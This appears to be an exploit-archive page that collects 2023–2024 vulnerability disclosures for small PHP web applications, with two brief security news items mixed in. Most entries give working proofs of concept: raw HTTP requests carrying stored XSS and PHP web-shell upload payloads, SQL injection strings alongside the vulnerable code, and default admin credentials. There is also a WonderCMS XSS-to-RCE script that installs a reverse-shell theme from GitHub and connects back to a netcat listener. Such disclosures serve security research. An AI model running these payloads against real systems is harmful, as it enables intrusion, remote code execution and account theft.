SPA-CART CMS version 1.9.0.3 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: SPA-CART CMS - Stored XSS  
# Date: 2024-01-03  
# Exploit Author: Eren Sen  
# Vendor: SPA-Cart  
# Vendor Homepage: https://spa-cart.com/  
# Software Link: https://demo.spa-cart.com/  
# Version: [1.9.0.3]  
# CVE-ID: N/A  
# Tested on: Kali Linux / Windows 10  
# Vulnerabilities Discovered Date : 2024/01/03

# Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability  
# Vulnerable Parameter Type: POST  
# Vulnerable Parameter: descr

# Proof of Concept: demo.spa-cart.com/product/258

# HTTP Request:

POST ////admin/products/258 HTTP/2  
Host: demo.spa-cart.com  
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx  
Content-Length: 1906  
Sec-Ch-Ua:  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36  
Sec-Ch-Ua-Platform: ""  
Origin: https://demo.spa-cart.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.spa-cart.com////admin/products/258  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="mode"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="sku"

SKU386

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="name"

asdf

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="cleanurl"

Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads  
------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="avail"

1000

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="price"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="list_price"

2

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="weight"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categoryid"

42

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

8

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

37

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="brandid"

4

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="status"

1

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl

Content-Disposition: form-data; name="descr"

<script>alert(1)</script>

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="title_tag"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl--

SPA-CART CMS 1.9.0.3 Cross Site Scripting

Petrol Pump Management Software version 1.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Petrol pump management software - File Upload Remote Code Execution (RCE) (unauthenticated)  
# Google Dork: N/A  
# Application: Petrol pump management software  
# Date: 20.02.2024  
# Bugs: File Upload Remote Code Execution (RCE) (unauthenticated)  
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html  
# Version: 1.0  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

Due to a security vulnerability in "fuelflow/admin/app/web_crud.php," unauthorized users can upload   
files using the "POST" method. The uploaded files are stored in the "/fuelflow/assets/images" folder.   
This allows malicious individuals to execute unauthorized commands on the system.

## Staus: HIGH-CRITICAL Vulnerability

## Proof of Concept (PoC):

Video:  
https://drive.google.com/file/d/1_jue-UhpASC_XxcUWU-QhMYDrSIehnWx/view

// File upload Request

POST /zerday/fuelflow/admin/app/web_crud.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: multipart/form-data; boundary=---------------------------82750242321210078514140255085  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/zer/fuelflow/admin/web.php  
Cookie: PHPSESSID=1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1

-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="id"

1  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="old_photo1_img"

test.png  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="photo1"; filename="3.php"  
Content-Type: image/png

<?php phpinfo();?>  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="title"

FuelFlow lite - Developed by Mayuri K. tessss  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="old_photos_img"

test.png  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="photos"; filename=""  
Content-Type: application/octet-stream

-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="sitekey"

test  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="secretkey"

test  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="update"

-----------------------------82750242321210078514140255085--

//  Phpinfo file locaton 

/zerday/fuelflow/assets/images/65d45a6080eca.php

Petrol Pump Management Software 1.0 Shell Upload

Tourism Management System version 2.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload# Google Dork: N/A# Exploit Author: SoSPiro# Date: 2024-02-18# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/tourism-management-system-free-download/# Version: 2.0# Tested on: Windows 10 Pro# Impact: Allows admin to upload all files to the web server# CVE : N/A# Exploit Description:The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input.# PoC requestPOST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201Content-Length: 361Origin: http://localhostConnection: closeReferer: http://localhost/zer/tms/admin/change-image.php?imgid=1Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhvUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1X-PwnFox-Color: red-----------------------------390927495111779706051786831201Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php"Content-Type: text/plain<?php phpinfo();?>-----------------------------390927495111779706051786831201Content-Disposition: form-data; name="submit"-----------------------------390927495111779706051786831201--===========================================================================================- Response -HTTP/1.1 200 OKDate: Sun, 18 Feb 2024 04:33:37 GMTServer: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-devX-Powered-By: PHP/8.1.13Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 8146============================================================================================- File location -http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php

Tourism Management System 2.0 Shell Upload

Google Cloud Run is currently being abused in high-volume malware distribution campaigns, spreading several banking trojans such as Astaroth (aka Guildma), Mekotio and Ousaban to targets across Latin America and Europe.
The volume of emails associated with these campaigns has significantly increased since September 2023 and we continue to regularly

Astaroth, Mekotio & Ousaban abusing Google Cloud Run in LATAM-focused malware campaigns

A critical security flaw in the Bricks theme for WordPress is being actively exploited by threat actors to run arbitrary PHP code on susceptible installations.
The flaw, tracked as CVE-2024-25600 (CVSS score: 9.8), enables unauthenticated attackers to achieve remote code execution. It impacts all versions of the Bricks up to and including 1.9.6.
It has been addressed by the theme developers in&

WordPress Bricks Theme Under Active Attack: Critical Flaw Impacts 25,000+ Sites

InstantCMS version 2.16.1 suffers from a persistent cross site scripting vulnerability that appears to require administrative access.

    # Exploit Title: InstantCMS - Store XSS# Application: InstantCMS # Version: v2.16.1   # Bugs: Stored XSS# Technology: PHP# Vendor Homepage: https://instantcms.ru/# Software Link: https://instantcms.ru/get# Date: 14.09.2023# Author: SoSPiro# Tested on: Windows## DescriptionI noticed that you filtered the filter very carefully. But there are still some parts you missed## POC1 . Login with admin2 . Go to "http://localhost/o2/admin/menu/item_edit/18"3 . Insert payload in CSS class4 . Click save , and go to home page, and Detect store xss in footerhttps://drive.google.com/file/d/1_9QGoBnbZZrsHUgNkujja1Ptj3f8fl2W/view?usp=sharing## ImpactThis security vulnerability has the potential to steal multiple users' cookies, gain unauthorized access to that user's account through stolen cookies, or redirect the user to other malicious websites...## Bug fix commithttps://github.com/instantsoft/icms2/commit/b2172a0f842fc28966b00bab3e2e9094c6bfd156## Referencehttps://huntr.com/bounties/18546c85-de6a-4252-a02f-c9d26f4f775e/

InstantCMS 2.16.1 Cross Site Scripting

Online Library Management System version 3 suffers from a password reset vulnerability due to a logic flaw of allowing the same email address to be set for multiple users.

    # Exploit Title: Online Library Management System v3 - Password Reset and Email Matching Vulnerability# Date: 12.09.2023# Exploit Author: SoSPiro# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/online-library-management-system/# Version: v3# Tested on: Windows 10 Pro 64 Bit  + Wampserver V3.3# CVE: N/A## Description:This report outlines a security vulnerability present in the web application called [Application Name]. This vulnerability allows users to create multiple accounts with the same email address and use that email address during the password reset process. This situation can compromise the security of user accounts.## Risk Level:This vulnerability can lead to serious security risks, including unauthorized access to user accounts and identity theft. It has the potential to have a significant impact.## Step-by-Step Description:1. User creates an account as "user1," with the email address set as "user@gmail.com."2. User creates another account as "user2" and uses the same email address, "user@gmail.com."3. User2 initiates a password reset process when forgetting the password.4. As a result of the password reset process, the password for the "user1" account is also reset and can be controlled by "user2."

Online Library Management System 3 Password Reset

Employee Management System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

# Exploit Title: Employee Management System - SQL Injection  
# Google Dork: N/A  
# Application: Employee Management System   
# Date: 19.02.2024  
# Bugs: SQL Injection   
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html  
# Version: N/A  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

In your code, there is a potential SQL injection vulnerability due to directly incorporating user-provided data into the SQL query used for user login. This situation increases the risk of SQL injection attacks where malicious users may input inappropriate data to potentially harm your database or steal sensitive information.

## Proof of Concept (PoC):

An example attacker could input the following into the email field instead of a valid email address:

In this case, the SQL query would look like:

SELECT * FROM users WHERE email='' OR '1'='1' --' AND password = '' AND status = 'Active'  
As "1=1" is always true, the query would return positive results, allowing the attacker to log in.

## Vulnerable code section:  
====================================================  
employee/Admin/login.php

<?php  
session_start();  
error_reporting(1);  
include('../connect.php');

//Get website details  
$sql_website = "select * from website_setting";   
$result_website = $conn->query($sql_website);  
$row_website = mysqli_fetch_array($result_website);

if(isset($_POST['btnlogin'])){

//Get Date  
date_default_timezone_set('Africa/Lagos');  
$current_date = date('Y-m-d h:i:s');

$email = $_POST['txtemail'];  
$password = $_POST['txtpassword'];  
$status = 'Active';

 $sql = "SELECT * FROM users WHERE email='" .$email. "' and password = '".$password."'  and status = '".$status."'";  
  $result = mysqli_query($conn, $sql);

if (mysqli_num_rows($result) > 0) {  
  // output data of each row  
 ($row = mysqli_fetch_assoc($result));  
   $_SESSION["email"] = $row['email'];  
   $_SESSION["password"] = $row['password'];  
 $_SESSION["phone"] = $row['phone'];  
    $firstname = $row['firstname'];  
     $_SESSION["firstname"] = $row['firstname'];

     $fa = $row['2FA'];

  }

Employee Management System 1.0 SQL Injection

WonderCMS version 4.3.2 remote exploit that leverages cross site scripting to achieve remote code execution.

    # Author: prodigiousMind# Exploit: Wondercms 4.3.2 XSS to RCEimport sysimport requestsimport osimport bs4if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")else:  data = '''var url = "'''+str(sys.argv[1])+'''";if (url.endsWith("/")) { url = url.slice(0, -1);}var urlWithoutLog = url.split("/").slice(0, -1).join("/");var urlWithoutLogBase = new URL(urlWithoutLog).pathname; var token = document.querySelectorAll('[name="token"]')[0].value;var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;var xhr3 = new XMLHttpRequest();xhr3.withCredentials = true;xhr3.open("GET", urlRev);xhr3.send();xhr3.onload = function() { if (xhr3.status == 200) {   var xhr4 = new XMLHttpRequest();   xhr4.withCredentials = true;   xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");   xhr4.send();   xhr4.onload = function() {     if (xhr4.status == 200) {       var ip = "'''+str(sys.argv[2])+'''";       var port = "'''+str(sys.argv[3])+'''";       var xhr5 = new XMLHttpRequest();       xhr5.withCredentials = true;       xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);       xhr5.send();            }   }; }};'''  try:    open("xss.js","w").write(data)    print("[+] xss.js is created")    print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))    print("----------------------------\n")    XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""    XSSlink = XSSlink.strip(" ")    print("send the below link to admin:\n\n----------------------------\n"+XSSlink)    print("----------------------------\n")    print("\nstarting HTTP server to allow the access to xss.js")    os.system("python3 -m http.server\n")  except: print(data,"\n","//write this to a file")

WonderCMS 4.3.2 Cross Site Scripting / Remote Code Execution

User Registration and Login and User Management System version 3.1 suffers from a remote SQL injection vulnerability.

#Exploit Title: User Registration & Login and User Management System With admin panel 3.1 - SQL injection  
# Application: User Registration & Login and User Management System  
# Date: 17.02.2024  
# Bugs: SQL Injection   
# Exploit Author: SoSPiro  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/  
# Tested on: Windows 10 64 bit Wampserver 

## Description:  
The file bwdates-report-result.php contains a potential security vulnerability related to user input validation. The script retrieves user-provided date inputs without proper validation, making it susceptible to SQL injection attacks.

## Vulnerability Details:  
- **Application Name**: User Registration & Login and User Management System  
- **Software Link**: [Download Link](https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/)  
- **Vendor Homepage**: [Vendor Homepage](https://phpgurukul.com/)

- The vulnerability lies in the following code snippet:

<?php  
$fdate=$_POST['fromdate'];  
$tdate=$_POST['todate'];

?>

<?php $ret=mysqli_query($con,"select * from users where date(posting_date) between '$fdate' and '$tdate'");  
$cnt=1;  
while($row=mysqli_fetch_array($ret))  
{?>

The script directly uses the user-supplied $fdate and $tdate variables in an SQL query without validating or sanitizing the input. This creates a potential avenue for malicious users to manipulate the query and perform SQL injection attacks.

## Vulnerability Description:

An attacker can exploit this vulnerability by crafting malicious input for the fromdate and todate parameters. By injecting SQL code into these fields, an attacker could manipulate the query to perform unauthorized actions on the database, potentially exposing sensitive information or even modifying the database contents.

## Proof of Concept (PoC):  
1. Visit the application locally at http://localhost/loginsystem/admin/ and login as admin  
admin user credentials which are installed by default

Username: admin  
Password: Test@12345

2. Go to "B/w Dates Report": http://localhost/loginsystem/admin/bwdates-report-ds.php  
3. Change the "To Datev" or "From Date" values. You can use this query by manipulating proxy tools like Burp Suite payload= "' OR '1'='1'; --".

Tag

#php